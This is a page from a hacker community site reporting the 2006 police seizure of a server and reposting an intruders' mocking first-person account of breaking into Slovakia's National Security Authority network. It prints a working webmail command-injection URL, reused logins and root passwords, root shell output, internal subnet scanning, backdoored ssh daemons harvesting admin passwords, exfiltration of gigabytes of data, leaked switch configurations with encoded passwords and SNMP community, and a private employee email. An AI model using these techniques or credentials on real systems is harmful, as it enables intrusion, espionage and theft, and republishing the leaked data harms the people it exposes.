::
 ::




location :: root / communities & e... / nbusr123

nbusr123


Po hacku slovenského Národného bezpečnostného úradu 25. dubna 2006 přišli 20. 7. 2006 v 10:00 slovenští policisté do serverovny a s na příkazu generální prokuratury fyzicky zajistili server Onyx, na ktoré byly uloženy data serveru Kyberia.sk, ale i stránky Hysteria.sk.

Správci Hysteria.sk - Maniac, Pajkus a Zyx - ale vydali prolášení, v kterém tvrdí, že server Onyx nebyl nikdy použit na hackování NBÚ a sloužil jen na komunikaci. Právě pro dokonalé zabezpečení komunikace byla "Hysteka" mezi hackery oblíbená.

Hackeři na zatčení serveru Onyx odpověděli 21. 7. 2006 demonstrativním odpojením celého serveru NBÚ od internetu. Podle NBÚ na problému už spolupracují s FBI a z Washingtonu má přiletět 7 specialistů...

Cached from: http://blackhole.sk/node/442


Vdaka primitivnemu zabezpeceniu spominanej institucie doslo k analnej penetracii serverov NBU bez vedomia milanovho. z nbu uniklo 20 gigabajtov mailov, internych dokumentov, smernic, nariadeni a podobnych pic**** :)

vsetko sa zacalo pri vtipkoch medzi kamaratmi, ktori si vsimli chybu v mailovom rozhrani na adrese webmail.nbusr.sk, pomocou ktorej bolo mozne vykonavat systemove prikazy na serveri. (ja viem, tato veta znie uplne napicu, ale tak nech chapu aj ludia menej zasveteni danej problematike ;))
tym padom bolo mozne prevziat zoznam lokalnych userov na masine.


http://webmail.nbusr.sk/horde/services/help/
?show=about&module=;%22.passthru(%22cat%20%22.
chr(47).%22etc%22.chr(47).%22passwd%22);%27.

do oci bil najma uzivatel s loginom nbusr
nuz...
kruty vtip - pouzit heslo nbusr123 - nam takmer roztrhol branice - heslo fungovalo (na prvy pokus). ukazalo sa motd a boli sme prihlaseni na masine

po chvilke skumania a behania po stroji sme skusili su na roota utok na branice cislo 2 :)


%su
www.nbusr.sk# id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
www.nbusr.sk# uname -a
FreeBSD www.nbusr.sk 6.0-RELEASE FreeBSD 6.0-RELEASE #0:Thu Nov 3 UTC 2005 root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386
www.nbusr.sk#

cize (pre ludi neznalych) ziskanie plnych prav nad serverom bolo z loginu nbusr mozne bez zadania akehokolvek hesla..

dalej prisiel scan na 10.0.240.0/24 co je subnet, v ktorom sa dana masina nachadza. (takze sme scanovali stroje, ktore uz nie su bezne dostupne z internetu a maju byt chranene ohnivou stenou ;)

odpovedalo cca 5-6 strojov na ktorych pocuvalo aj sshd.

takze dalej sme sa skusili prihlasit na jednu z tychto masin, uz so znamym loginom a heslom nbusr/nbusr123. samozrejme, situacia sa opakovala a opat sme mali shell.
tento stroj mal nazov archive, co naznacovalo ze sa tam bude nachadzat nieco zaujimave.

po asi pol hodine behania po disku sme nasli v homedire jedneho z adminov zdrojaky akejsi backupovacej utility pisanej v cecku. (btw vcelku dobry kod, aj ked backupovanie pgsql riesit v cecku mi pride ako skrabanie sa ;). hned na zaciatku zdrojaku bolo zadefinovane login/heslo do databazy. heslo bolo 123456 :) v tom prisiel zajumavy napad skusit toto heslo na roota


nbusr@archive> su
Password:
nbusr@archive# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
nbusr@archive# uname -a
FreeBSD archive.nbusr.sk 4.10-STABLE FreeBSD 4.10-STABLE #1: Mon Feb 14 14:47:10
CET 2005 root@archive.nbusr.sk:/usr/src/sys/compile/ARCHIVE i386
nbusr@archive#

dalsi zachvat branice..

z archivu sme si odniesli cca 18 gb databazu taktiez zaujimavou masinou bolo ep.nbusr.sk ;)

po ziskani tohoto hesla sa nam otvorila v podstate cela siet, kedze heslo fungovalo na vsetky ostatne zariadenia unixoveho (servre) alebo sietoveho charakteru (cisco routre/switche). vecer sa nasadili na masiny zabackdoorovane ssh demony, ktore nam zaznamenavali pohyb adminov po dalsich strojoch (aj s heslami of course :) )
pod ruskom noci cez switche a routre veselo tiekli gigabajty mejlov a inych dovernych dat ku nam, do spravnych ruk na kryptovane disky ;)

po bezradnych tahoch administratorov je v dobe pisania tohto clanku stale mozny plny pristup do siete nbu. ktokolvek s minimalnymi znalostami pocitacov si moze v pohodli svojho domova pristupovat k ich datam. nie vsetko co je bezpecne je naozaj bezpecne a nie vsetko co je tajne je az tak tajne :) smutnym mementom tohto cinu je zistenie, ze azet je lepsie zabezpecenym systemom ako institucia zastresujuca vysoko doverne dokumenty.

tymto sa s vam lucime, pozdravujem babicku a psa filipa, feriho.. chcem svetovy mier, radostny zivot pre vsetky deti sveta a papiere pre kazdeho :)

lahodka na zaver, narodny (ne)bezpecnostny urad:
(dokumenty kvoli obavam z obvieniam z vlastizrady a upaleniu na hranici zverejnovat nebudeme)
taakze, nejake tie prompty, konfigy, mejly ;)
enjoy

update: kedze okolo celej situacie vznikla slusna afera, mozete si kupit aj recesisticke tricka.


root@fw.nbu.ba# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
uz root@fw.nbu.ba# uname -a
FreeBSD fw.nbu.ba 4.10-RELEASE FreeBSD 4.10-RELEASE #0: Wed Jul 14 15:56:18 GMT 2004 kockac@builder.netlabplus.sk:/usr/src/release/picobsd/build_dir-fleshboxR/PICOBSD-fleshboxR i386
root@fw.nbu.ba#
root@fw.nbu.ba# df -h
Filesystem Size Used Avail Capacity Mounted on
/dev/md0c 47M 24M 23M 52% /
root@fw.nbu.ba#

s4.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(14)EA1a, RELEASE SOFTWARE
(fc1)
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Tue 02-Sep-03 03:33 by antonino
Image text-base: 0x80010000, data-base: 0x805C0000

ROM: Bootstrap program is CALHOUN boot loader

s4.nbu.ba uptime is 45 weeks, 5 days, 16 hours, 10 minutes
System returned to ROM by power-on
System restarted at 11:31:30 CETdst Sat Jun 4 2005
System image file is "flash:/c2950-i6q4l2-mz.121-14.EA1a.bin"

cisco WS-C2950-24 (RC32300) processor (revision M0) with 20710K bytes of memory.
Processor board ID FOC0752Y3BL
Last reset from system-reset
Running Standard Image
24 FastEthernet/IEEE 802.3 interface(s)

s7.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C3500XL Software (C3500XL-C3H2S-M), Version 12.0(5)WC9, RELEASE SOFTWARE
(fc1)
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Fri 19-Sep-03 10:01 by antonino
Image text-base: 0x00003000, data-base: 0x0034E434

ROM: Bootstrap program is C3500XL boot loader

s7.nbu.ba uptime is 45 weeks, 5 days, 15 hours, 13 minutes
System returned to ROM by power-on
System restarted at 12:08:39 CETdst Sat Jun 4 2005
System image file is "flash:c3500xl-c3h2s-mz.120-5.WC9.bin"

cisco WS-C3524-XL (PowerPC403) processor (revision 0x01) with 8192K/1024K bytes o
f memory.
Processor board ID FAB0547P1KW, with hardware revision 0x00
Last reset from power-on

s9.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C3500XL Software (C3500XL-C3H2S-M), Version 12.0(5.2)XU, MAINTENANCE INT
ERIM SOFTWARE
Copyright (c) 1986-2000 by cisco Systems, Inc.
Compiled Mon 17-Jul-00 18:29 by ayounes
Image text-base: 0x00003000, data-base: 0x00301F3C

ROM: Bootstrap program is C3500XL boot loader

s9.nbu.ba uptime is 45 weeks, 5 days, 14 hours, 46 minutes
System returned to ROM by power-on
System restarted at 12:34:15 CETdst Sat Jun 4 2005
System image file is "flash:c3500XL-c3h2s-mz-120.5.2-XU.bin"

cisco WS-C3524-XL (PowerPC403) processor (revision 0x01) with 8192K/1024K bytes o
f memory.
Processor board ID FAB0514Q18E, with hardware revision 0x00
Last reset from power-on

s11.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(13)EA1, RELEASE SOFTWARE (
fc1)
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Tue 04-Mar-03 02:14 by yenanh
Image text-base: 0x80010000, data-base: 0x805A8000

ROM: Bootstrap program is CALHOUN boot loader

s11.nbu.ba uptime is 3 weeks, 3 days, 11 hours, 30 minutes
System returned to ROM by power-on
System image file is "flash:/c2950-i6q4l2-mz.121-13.EA1.bin"

cisco WS-C2950G-24-EI (RC32300) processor (revision G0) with 20839K bytes of memo
ry.
Processor board ID FOC0743Z2H9
Last reset from system-reset
Running Enhanced Image
24 FastEthernet/IEEE 802.3 interface(s)
2 Gigabit Ethernet/IEEE 802.3 interface(s)

mno a nejaky ten cicko konfig ;)

root@archive# telnet 10.0.200.11
Trying 10.0.200.11...
Connected to 10.0.200.11.
Escape character is '^]'.

User Access Verification

Username: nbusr
Password:
s11.nbu.ba>ena
Password:
Password:
s11.nbu.ba#sh run
Building configuration...
Current configuration : 3761 bytes
!
version 12.1
no service pad
service timestamps debug datetime msec localtime show-timezone
service timestamps log datetime msec localtime show-timezone
service password-encryption
!
hostname s11.nbu.ba
!
enable password 7 101F5B4A514244
!
username nbusr password 7 070123595D1B485744
clock timezone CET 1
clock summer-time CETdst recurring last Sun Mar 2:00 last Sun Oct 3:00
ip subnet-zero
ip rcmd rsh-enable
ip rcmd remote-host monitor 10.0.240.7 monitor enable
ip rcmd remote-host www 10.0.240.7 www enable
no ip domain-lookup
!
spanning-tree mode pvst
no spanning-tree optimize bpdu transmission
spanning-tree extend system-id
!
!
interface FastEthernet0/1
description 919 - III 11 08
switchport trunk native vlan 999
switchport mode trunk
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/2
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/3
escription 1118 - 18 2
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/4
description 1116 - 16 5
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/5
description 1114 - 14 9
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/6
description 1114 - 14 10
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/7
description 1112 - 12 13
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet
description 1111 - 11 15
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/9
description 1130 - 30 18
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/10
description 1124 - 24 30
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/11
description 1123 - 23 32
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/12
description 1122 - 22 33
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/13
switchport access vlan 3
switchport mode access
no ip address
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/14
no ip address
no cdp enable
!
interface FastEthernet0/15
no ip address
no cdp enable
ernet0/8
!
interface FastEthernet0/16
no ip address
no cdp enable
!
interface FastEthernet0/17
no ip address
no cdp enable
!
interface FastEthernet0/18
no ip address
no cdp enable
!
interface FastEthernet0/19
no ip address
no cdp enable
!
interface FastEthernet0/20
no ip address
no cdp enable
!
interface FastEthernet0/21
no ip address
no cdp enable
!
interface FastEthernet0/22
no ip address
no cdp enable
!
interface FastEthernet0/23
no ip address
no cdp enable
!
interface FastEthernet0/24
no ip address
no cdp enable
!
interface GigabitEthernet0/1
no ip address
no cdp enable
!
interface FastEthernet0/24
no ip address
no cdp enable
!interface GigabitEthernet0/1
no ip address
no cdp enable
!
interface GigabitEthernet0/2
no ip address
no cdp enable
!
interface Vlan1
ip address 10.0.200.11 255.255.255.0
no ip route-cache
!
ip default-gateway 10.0.200.1
no ip http server
!
no cdp run
snmp-server engineID local 00000009020000078432D3C0
snmp-server community swmon RO
!
line con 0
exec-timeout 0 0
logging synchronous
login local
stopbits 1
line vty 0 4
exec-timeout 0 0
logging synchronous
login local
line vty 5 15
exec-timeout 0 0
logging synchronous
login local
!
ntp clock-period 17179919
ntp server 213.215.72.7
end

a nejaky ten vlan semtam :) :

s9.nbu.ba#sh vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Gi0/1, Gi0/2
2 Servers active
3 Workstations active Fa0/5, Fa0/6, Fa0/7, Fa0/8,
Fa0/9, Fa0/10, Fa0/11, Fa0/12,
Fa0/13, Fa0/15, Fa0/16, Fa0/17,
Fa0/18, Fa0/19, Fa0/20, Fa0/21,
Fa0/22, Fa0/23, Fa0/24
4 Govnet active Fa0/14
999 Dummy active

mno a toto je platene z penazi slovenskych danovych poplatnikov ;)
(ukazka z mailovej komunikacie jedneho zo zamestnancov)


Date: Fri, 24 Feb 2006 12:53:50 +0100
From: xxxx xxxx
Subject: ahojky
To: xxx xxx
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
Ahoj xxxx, zdravi Ta xxxx ("hajzel z Komjatic" xixi).
Ty sa mi nejako neozyvas z toho Londonu.... ja viem neni tolko casu. A ja tiez nepisem nejako obzvlast casto... prepac!!! Ani neviem o com ti mam napisat,... tolko kreativity som u seba este nevidel, xaxa Mame sa tu na nasom urade velmi dobre.... ved vies, ze sa od prace nejdeme pretrhnut.

 

Comments





    visions :: homes :: register :: forgot password
kyberka  ars morta universum  Web Independant Manifesto